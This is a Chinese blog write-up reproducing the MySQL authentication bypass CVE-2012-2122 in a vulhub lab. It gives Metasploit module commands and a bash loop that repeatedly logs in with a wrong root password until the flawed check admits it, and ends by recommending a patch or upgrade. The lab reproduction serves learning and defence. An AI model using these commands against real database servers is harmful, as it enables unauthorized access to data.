MySql身份认证绕过漏洞(CVE-2012-2122)

已于 2022-07-24 14:57:44 修改
阅读量4.6k 收藏 8
点赞数 1
文章标签: mysql 数据库
于 2022-07-24 14:54:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dgjkkhcf/article/details/125959258
版权

目录

一、MySql身份认证绕过漏洞(CVE-2012-2122)

1、漏洞简介

2、受影响的版本

二、复现环境

三、漏洞复现

1、进入vulhub-master/mysql/CVE-2012-2122目录下执行如下命令启动测试环境,查看容器启动状态

2、启动msf,查询并使用攻击模块,设置相应的配置,yes处没有的要配置上去不要空着

3、使用exploit或run命令对靶机进行攻击

四、漏洞解决办法

一、MySql身份认证绕过漏洞(CVE-2012-2122)

1、漏洞简介

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

2、受影响的版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

二、复现环境

攻击机:kali-linux-2022.2(IP:192.168.50.133/24)

靶机:Ubuntu(IP:192.168.50.189/24)

Ubuntu已安装vulhub靶场环境,由于该漏洞复现过程较容易,有些地方一笔带过,工具请去官网自行下载

三、漏洞复现

经过测试,本环境虽然运行在容器内部,但漏洞是否能够复现仍然与宿主机有一定关系

1、进入vulhub-master/mysql/CVE-2012-2122目录下执行如下命令启动测试环境,查看容器启动状态

        docker-compose up -d

        docker ps

2、启动msf,查询并使用攻击模块,设置相应的配置,yes处没有的要配置上去不要空着

        msfconsole

        search cve-2012-2122

        use 0

        set rhosts 192.168.50.189

3、使用exploit或run命令对靶机进行攻击

        run

漏洞在第三步已复现完,这是补充:在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录,大概需尝试200多次才能拿到mysql数据库的密码,具体多少次忘了,等待时间可能很长:

        for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.50.189 -P3306 ; done

四、漏洞解决办法

1、升级官方补丁

2、更新mysql

猿猿酱
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1265
在一个虚拟机中操作。
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
Mysql 身份认证绕过漏洞CVE-2012-2122
ws_001的博客
06-12 1230
Mysql 身份认证绕过漏洞CVE-2012-2122
MySql-身份认证绕过-CVE-2012-2122
m0_57206390的博客
10-27 327
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库
CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
c0529的博客
06-12 509
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入使用:kali+vulhub。
Mysql 身份认证绕过CVE-2012-2122
bqnagus
10-02 746
Mysql 身份认证绕过CVE-2012-2122)复现
Mysql 身份认证绕过漏洞CVE-2012-2122)复现
weixin_64809022的博客
03-20 316
首先进入输入cd /vuluhub/mysql 的根目录下,然后ls查看内容,我们可以看到靶场的编号,进入这个编号的目录下,使用命令 docker-compose up -d启动靶场。这样我们就可以直接进入MySQL中,然后就可以执行MySQL的相关命令了。这里我们可以看到靶场的IP地址,以及MySQL的监听端口3306。1. 然后我们进入kali,使用扫描出靶场的IP地址。首先,启动msf数据库服务,进入msfconsole。首先我们要搭建MySQL的环境,启动docker。第一种方法:利用msf验证。
Mysql身份认证绕过漏洞CVE-2012-2122)复现
君莫hacker的博客
09-12 2490
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
qq_51331767的博客
03-17 293
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录,出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。爆破多次即绕过身份验证,成功登录数据库,复现成功。2、访问3306端口查看环境。
数据库安全:MySQL 身份认证漏洞CVE-2012-2122
网络安全领域___专研者.
11-10 740
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授权的方式进行访问 MySQL 数据库
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 1024
漏洞CVE 2012-2122复现——Mysql身份验证绕过
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675是一个特定的漏洞,它可能允许未经身份验证的远程攻击者执行代码或获取敏感信息,对系统的安全性构成威胁。 补丁“p12880299”是Oracle官方发布的一个修复程序,旨在修补CVE-2012-1675漏洞。补丁编号...
MYSQL
maoqiwei的博客
07-23 259
1.修改student 表中年龄(sage)字段属性,数据类型由int 改变为smallint 2.为Course表中Cno 课程号字段设置索引,并查看索引 3.为SC表建立按学号(sno)和课程号(cno)组合的升序的主键索引,索引名为SC_INDEX4.创建一视图 stu info,查询全体学生的姓名,性别,课程名,成绩5.删除所有索引
MySQL字段设置的varchar长度小于数据长度自动截取丢弃超出的长度而不是报错?
weixin_43831997的博客
07-23 359
MySQL数据库设置为==严格模式(STRICT_TRANS_TABLES 或 STRICT_ALL_TABLES)==时,如果尝试插入或更新超过设定长度的数据,将会导致错误,并阻止该事务进行。在默认情况下,或者在非严格模式(NO_STRICT)下,当插入长度超出 VARCHAR 字段定义的字符串时,MySQL会自动截断超出的部分,并发出一个警告,而不是错误。
MySQL中的CREATE EVENT 语句详解
最新发布
u011565038的博客
07-24 526
CREATE EVENT语句在 MySQL 中用于创建一个事件调度器(Event Scheduler)的事件。事件调度器允许你安排数据库任务(如查询、数据更新等)在将来的某个时间点自动执行,或者根据特定的时间间隔重复执行。这对于需要定期执行的任务特别有用,比如数据清理、报表生成等。
NTP 身份验证绕过漏洞(CVE-2015-7871)
05-09
CVE-2015-7871是NTP中的一个身份验证绕过漏洞,攻击者可以利用该漏洞来实现远程攻击并控制目标机器。 该漏洞的原因是NTP在处理某些特殊的数据包时会发生缓冲区溢出,导致攻击者可以通过发送精心构造的数据包来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猿猿酱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值